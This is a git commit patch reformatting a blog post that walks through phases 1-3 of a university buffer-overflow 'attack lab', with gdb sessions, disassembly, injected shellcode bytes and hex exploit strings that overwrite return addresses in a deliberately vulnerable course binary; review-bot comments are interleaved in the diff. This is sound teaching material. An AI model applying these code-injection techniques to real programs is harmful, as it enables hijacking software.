From 5a4f10383b939a5ba78db9d293f6a3d724e3f2a0 Mon Sep 17 00:00:00 2001 From: Navan Chauhan Date: Tue, 17 Oct 2023 15:18:40 -0600 Subject: formatting --- Content/posts/2023-10-05-attack-lab.md | 30 +++-- docs/feed.rss | 213 +++++++++++++++++++-------------- docs/posts/2023-10-05-attack-lab.html | 209 ++++++++++++++++++-------------- 3 files changed, 260 insertions(+), 192 deletions(-) diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md index 1f87aca..c4af406 100644 --- a/Content/posts/2023-10-05-attack-lab.md +++ b/Content/posts/2023-10-05-attack-lab.md @@ -42,14 +42,14 @@ We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to ` Now, since we know the buffer size we can try passing the address of the touch1 function. -``` +```bash jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1 000000000040261e : ``` We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)' little ``` @@ -63,7 +63,7 @@ We have our padding size and the function we need to call, we can write it in `c 1e 26 40 00 00 00 00 00 ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch1!: You called touch1() 
@@ -100,14 +100,14 @@ however, you must make it appear to touch2 as if you have passed your cookie as This hint tells us that we need to store the cookie in the rdi register -``` +```asm movq $0x3e8dee8f,%rdi retq ``` To get the byte representation, we need to compile the code and then disassemble it. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o phase2.s: Assembler messages: phase2.s: Warning: end of file not at end of a line; newline inserted @@ -140,7 +140,7 @@ We need to find the address of `%rsp` after calling `` and sending a reall What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. @@ -197,7 +197,7 @@ address of touch2 function To get the address of `touch2` we can run: -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2 000000000040264e : 402666: 74 2a je 402692 @@ -214,7 +214,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, -``` +```bash joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch2!: You called touch2(0x3e8dee8f) 
@@ -238,8 +238,13 @@ where you place the string representation of your cookie. Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself. +The rationale is simple: by the time our payload is executed, we will be setting `%rdi` to point to the cookie. Placing the cookie after `touch3` function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets. + => The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex) +* Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the `touch3` function) +* Touch 3 (8 bytes): The address of the `touch3` function is 8 bytes long. + We can use our address for `%rsp` from phase 2, and simply add `0x28` to it. => `0x55621b40` + `0x28` = `0x55621B68` @@ -251,7 +256,7 @@ movq $0x55621B68, %rdi retq ``` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o phase3.s: Assembler messages: phase3.s: Warning: end of file not at end of a line; newline inserted @@ -278,7 +283,7 @@ cookie string To quickly get the address for `touch3` -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3 0000000000402763 : 402781: 74 2d je 4027b0 @@ -287,7 +292,7 @@ jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep to We need to use an ASCII to Hex converter to convert the cookie string into hex. -``` +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p 3365386465653866 ``` 
@@ -303,7 +308,8 @@ Thus, our cookie string representation is `33 65 38 64 65 65 38 66` 33 65 38 64 65 65 38 66 ``` -``` + +```bash jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget Cookie: 0x3e8dee8f Type string:Touch3!: You called touch3("3e8dee8f") diff --git a/docs/feed.rss b/docs/feed.rss index 212045a..268c5ec 100644 --- a/docs/feed.rss +++ b/docs/feed.rss @@ -4,8 +4,8 @@ Navan's Archive Rare Tips, Tricks and Posts https://web.navan.dev/en - Tue, 17 Oct 2023 14:53:31 -0000 - Tue, 17 Oct 2023 14:53:31 -0000 + Tue, 17 Oct 2023 15:18:29 -0000 + Tue, 17 Oct 2023 15:18:29 -0000 250 @@ -1412,15 +1412,19 @@ Serving HTTP on 0.0.0.0 port 8000 ...

Now, since we know the buffer size we can try passing the address of the touch1 function.

-
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
-000000000040261e <touch1>:
+
+
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
+000000000040261e <touch1>:
 
+

We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
 little
 
+

We have our padding size and the function we need to call, we can write it in ctarget.l1.txt

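Review bot: every `-` line in this `@@ -1412` hunk is re-added verbatim, and the only visible additions are the empty `+` lines that now surround each block; the change the Markdown hunk makes (the fence language tag) does not show up in the rendered feed text, so this hunk is regeneration churn that cannot be reviewed on its own. If the feed is rebuilt on every commit, consider committing the regenerated `docs/` output separately from the `Content/` source edit so the substantive change stays reviewable.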
@@ -1430,13 +1434,15 @@ little 1e 26 40 00 00 00 00 00
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch1!: You called touch1()
-Valid solution for level 1 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch1!: You called touch1()
+Valid solution for level 1 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 2

@@ -1475,25 +1481,29 @@ NICE JOB!

This hint tells us that we need to store the cookie in the rdi register

-
movq $0x3e8dee8f,%rdi 
-retq
+
+
movq $0x3e8dee8f,%rdi 
+retq
 
+

To get the byte representation, we need to compile the code and then disassemble it.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
-phase2.s: Assembler messages:
-phase2.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
+phase2.s: Assembler messages:
+phase2.s: Warning: end of file not at end of a line; newline inserted
 
-phase2.o:     file format elf64-x86-64
+phase2.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
-   7:   c3                      ret    
+0000000000000000 <.text>:
+   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
+   7:   c3                      ret    
 
+

Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3

@@ -1512,48 +1522,50 @@ Disassembly of section .text:

What we are going to do now is to add a break on getbuf, and run the program just after it asks us to enter a string and then find the address of %rsp

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
-GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-Copyright (C) 2022 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law.
-Type "show copying" and "show warranty" for details.
-This GDB was configured as "x86_64-linux-gnu".
-Type "show configuration" for configuration details.
-For bug reporting instructions, please see:
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
 <https://www.gnu.org/software/gdb/bugs/>.
-Find the GDB manual and other documentation resources online at:
-    <http://www.gnu.org/software/gdb/documentation/>.
-
-For help, type "help".
-Type "apropos word" to search for commands related to "word"...
-Reading symbols from ./ctarget...
-(gdb) b getbuf
-Breakpoint 1 at 0x402608: file buf.c, line 12.
-(gdb) run
-Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
-Cookie: 0x3e8dee8f
-
-Breakpoint 1, getbuf () at buf.c:12
-12      buf.c: No such file or directory.
-(gdb) disas
-Dump of assembler code for function getbuf:
-=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
-   0x000000000040260c <+4>:     mov    %rsp,%rdi
-   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
-   0x0000000000402614 <+12>:    mov    $0x1,%eax
-   0x0000000000402619 <+17>:    add    $0x18,%rsp
-   0x000000000040261d <+21>:    ret    
-End of assembler dump.
-(gdb) until *0x402614
-Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
-getbuf () at buf.c:15
-15      in buf.c
-(gdb) x/s $rsp
-0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
-(gdb)
+Find the GDB manual and other documentation resources online at:
+    <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./ctarget...
+(gdb) b getbuf
+Breakpoint 1 at 0x402608: file buf.c, line 12.
+(gdb) run
+Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
+Cookie: 0x3e8dee8f
+
+Breakpoint 1, getbuf () at buf.c:12
+12      buf.c: No such file or directory.
+(gdb) disas
+Dump of assembler code for function getbuf:
+=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
+   0x000000000040260c <+4>:     mov    %rsp,%rdi
+   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
+   0x0000000000402614 <+12>:    mov    $0x1,%eax
+   0x0000000000402619 <+17>:    add    $0x18,%rsp
+   0x000000000040261d <+21>:    ret    
+End of assembler dump.
+(gdb) until *0x402614
+Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
+getbuf () at buf.c:15
+15      in buf.c
+(gdb) x/s $rsp
+0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
+(gdb)
 
+

So, the address for %rsp is 0x55621b40

@@ -1567,11 +1579,13 @@ address of touch2 function

To get the address of touch2 we can run:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
-000000000040264e <touch2>:
-  402666:       74 2a                   je     402692 <touch2+0x44>
-  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
+000000000040264e <touch2>:
+  402666:       74 2a                   je     402692 <touch2+0x44>
+  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
 
+
48 c7 c7 8f ee 8d 3e c3
 00 00 00 00 00 00 00 00
@@ -1582,13 +1596,15 @@ address of touch2 function
 
 

Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,

-
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch2!: You called touch2(0x3e8dee8f)
-Valid solution for level 2 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch2!: You called touch2(0x3e8dee8f)
+Valid solution for level 2 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 3

@@ -1613,8 +1629,15 @@ NICE JOB!

Because hexmatch and strncmp might overwrite the buffer allocated for getbuf we will try to store the data after the function touch3 itself.

+

The rationale is simple: by the time our payload is executed, we will be setting %rdi to point to the cookie. Placing the cookie after touch3 function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.

+

=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)

+
    +
  • Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the touch3 function)
  • +
  • Touch 3 (8 bytes): The address of the touch3 function is 8 bytes long.
  • +
+

We can use our address for %rsp from phase 2, and simply add 0x28 to it.

=> 0x55621b40 + 0x28 = 0x55621B68

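Review bot: the rendered list in this `@@ -1613` hunk contains bullet entries with no text (the `• +` lines after each of the two real items), so the generated `<ul>` appears to carry empty entries in addition to "Return Address" and "Touch 3". Check the Markdown list source (a blank line between the `=>` line and the first `*` item, no blank `+` lines inside the list) and regenerate rather than editing the feed by hand.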
@@ -1627,19 +1650,21 @@ NICE JOB!
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
-phase3.s: Assembler messages:
-phase3.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
+phase3.s: Assembler messages:
+phase3.s: Warning: end of file not at end of a line; newline inserted
 
-phase3.o:     file format elf64-x86-64
+phase3.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
-   7:   c3                      ret
+0000000000000000 <.text>:
+   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
+   7:   c3                      ret
 
+

Thus, our answer is going to be in the form:

@@ -1652,17 +1677,21 @@ cookie string

To quickly get the address for touch3

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
-0000000000402763 <touch3>:
-  402781:       74 2d                   je     4027b0 <touch3+0x4d>
-  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
+0000000000402763 <touch3>:
+  402781:       74 2d                   je     4027b0 <touch3+0x4d>
+  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
 
+

We need to use an ASCII to Hex converter to convert the cookie string into hex.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
-3365386465653866
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
+3365386465653866
 
+

Thus, our cookie string representation is 33 65 38 64 65 65 38 66

@@ -1674,13 +1703,15 @@ cookie string 33 65 38 64 65 65 38 66
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch3!: You called touch3("3e8dee8f")
-Valid solution for level 3 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch3!: You called touch3("3e8dee8f")
+Valid solution for level 3 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phases 1-3 Complete.

]]> diff --git a/docs/posts/2023-10-05-attack-lab.html b/docs/posts/2023-10-05-attack-lab.html index 393951b..67d17ca 100644 --- a/docs/posts/2023-10-05-attack-lab.html +++ b/docs/posts/2023-10-05-attack-lab.html @@ -78,15 +78,19 @@

Now, since we know the buffer size we can try passing the address of the touch1 function.

-
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
-000000000040261e <touch1>:
+
+
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
+000000000040261e <touch1>:
 
+

We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
 little
 
+

We have our padding size and the function we need to call, we can write it in ctarget.l1.txt

@@ -96,13 +100,15 @@ little 1e 26 40 00 00 00 00 00
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch1!: You called touch1()
-Valid solution for level 1 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch1!: You called touch1()
+Valid solution for level 1 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 2

@@ -141,25 +147,29 @@ NICE JOB!

This hint tells us that we need to store the cookie in the rdi register

-
movq $0x3e8dee8f,%rdi 
-retq
+
+
movq $0x3e8dee8f,%rdi 
+retq
 
+

To get the byte representation, we need to compile the code and then disassemble it.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
-phase2.s: Assembler messages:
-phase2.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
+phase2.s: Assembler messages:
+phase2.s: Warning: end of file not at end of a line; newline inserted
 
-phase2.o:     file format elf64-x86-64
+phase2.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
-   7:   c3                      ret    
+0000000000000000 <.text>:
+   0:   48 c7 c7 8f ee 8d 3e    mov    $0x3e8dee8f,%rdi
+   7:   c3                      ret    
 
+

Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3

@@ -178,48 +188,50 @@ Disassembly of section .text:

What we are going to do now is to add a break on getbuf, and run the program just after it asks us to enter a string and then find the address of %rsp

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
-GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-Copyright (C) 2022 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law.
-Type "show copying" and "show warranty" for details.
-This GDB was configured as "x86_64-linux-gnu".
-Type "show configuration" for configuration details.
-For bug reporting instructions, please see:
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
 <https://www.gnu.org/software/gdb/bugs/>.
-Find the GDB manual and other documentation resources online at:
-    <http://www.gnu.org/software/gdb/documentation/>.
-
-For help, type "help".
-Type "apropos word" to search for commands related to "word"...
-Reading symbols from ./ctarget...
-(gdb) b getbuf
-Breakpoint 1 at 0x402608: file buf.c, line 12.
-(gdb) run
-Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
-Cookie: 0x3e8dee8f
-
-Breakpoint 1, getbuf () at buf.c:12
-12      buf.c: No such file or directory.
-(gdb) disas
-Dump of assembler code for function getbuf:
-=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
-   0x000000000040260c <+4>:     mov    %rsp,%rdi
-   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
-   0x0000000000402614 <+12>:    mov    $0x1,%eax
-   0x0000000000402619 <+17>:    add    $0x18,%rsp
-   0x000000000040261d <+21>:    ret    
-End of assembler dump.
-(gdb) until *0x402614
-Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
-getbuf () at buf.c:15
-15      in buf.c
-(gdb) x/s $rsp
-0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
-(gdb)
+Find the GDB manual and other documentation resources online at:
+    <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./ctarget...
+(gdb) b getbuf
+Breakpoint 1 at 0x402608: file buf.c, line 12.
+(gdb) run
+Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget 
+Cookie: 0x3e8dee8f
+
+Breakpoint 1, getbuf () at buf.c:12
+12      buf.c: No such file or directory.
+(gdb) disas
+Dump of assembler code for function getbuf:
+=> 0x0000000000402608 <+0>:     sub    $0x18,%rsp
+   0x000000000040260c <+4>:     mov    %rsp,%rdi
+   0x000000000040260f <+7>:     call   0x4028a9 <Gets>
+   0x0000000000402614 <+12>:    mov    $0x1,%eax
+   0x0000000000402619 <+17>:    add    $0x18,%rsp
+   0x000000000040261d <+21>:    ret    
+End of assembler dump.
+(gdb) until *0x402614
+Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
+getbuf () at buf.c:15
+15      in buf.c
+(gdb) x/s $rsp
+0x55621b40:     "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
+(gdb)
 
+

So, the address for %rsp is 0x55621b40

@@ -233,11 +245,13 @@ address of touch2 function

To get the address of touch2 we can run:

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
-000000000040264e <touch2>:
-  402666:       74 2a                   je     402692 <touch2+0x44>
-  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
+000000000040264e <touch2>:
+  402666:       74 2a                   je     402692 <touch2+0x44>
+  4026b2:       eb d4                   jmp    402688 <touch2+0x3a>
 
+
48 c7 c7 8f ee 8d 3e c3
 00 00 00 00 00 00 00 00
@@ -248,13 +262,15 @@ address of touch2 function
 
 

Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,

-
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch2!: You called touch2(0x3e8dee8f)
-Valid solution for level 2 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch2!: You called touch2(0x3e8dee8f)
+Valid solution for level 2 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phase 3

@@ -279,8 +295,15 @@ NICE JOB!

Because hexmatch and strncmp might overwrite the buffer allocated for getbuf we will try to store the data after the function touch3 itself.

+

The rationale is simple: by the time our payload is executed, we will be setting %rdi to point to the cookie. Placing the cookie after touch3 function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.

+

=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)

+
    +
  • Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the touch3 function)
  • +
  • Touch 3 (8 bytes): The address of the touch3 function is 8 bytes long.
  • +
+

We can use our address for %rsp from phase 2, and simply add 0x28 to it.

=> 0x55621b40 + 0x28 = 0x55621B68

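Review bot: this `@@ -279` hunk shows the same empty-bullet rendering as the feed (`• +` lines following each real item). Since `docs/` appears to be generated from `Content/` (the three files carry identical text changes), fix the list in the Markdown source and rebuild; hand-editing this HTML would be overwritten on the next build.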
@@ -293,19 +316,21 @@ NICE JOB!
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
-phase3.s: Assembler messages:
-phase3.s: Warning: end of file not at end of a line; newline inserted
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
+phase3.s: Assembler messages:
+phase3.s: Warning: end of file not at end of a line; newline inserted
 
-phase3.o:     file format elf64-x86-64
+phase3.o:     file format elf64-x86-64
 
 
-Disassembly of section .text:
+Disassembly of section .text:
 
-0000000000000000 <.text>:
-   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
-   7:   c3                      ret
+0000000000000000 <.text>:
+   0:   48 c7 c7 68 1b 62 55    mov    $0x55621b68,%rdi
+   7:   c3                      ret
 
+

Thus, our answer is going to be in the form:

@@ -318,17 +343,21 @@ cookie string

To quickly get the address for touch3

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
-0000000000402763 <touch3>:
-  402781:       74 2d                   je     4027b0 <touch3+0x4d>
-  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
+0000000000402763 <touch3>:
+  402781:       74 2d                   je     4027b0 <touch3+0x4d>
+  4027d3:       eb d1                   jmp    4027a6 <touch3+0x43>
 
+

We need to use an ASCII to Hex converter to convert the cookie string into hex.

-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
-3365386465653866
+
+
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
+3365386465653866
 
+

Thus, our cookie string representation is 33 65 38 64 65 65 38 66

@@ -340,13 +369,15 @@ cookie string 33 65 38 64 65 65 38 66
-
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
-Cookie: 0x3e8dee8f
-Type string:Touch3!: You called touch3("3e8dee8f")
-Valid solution for level 3 with target ctarget
-PASS: Sent exploit string to server to be validated.
-NICE JOB!
+
+
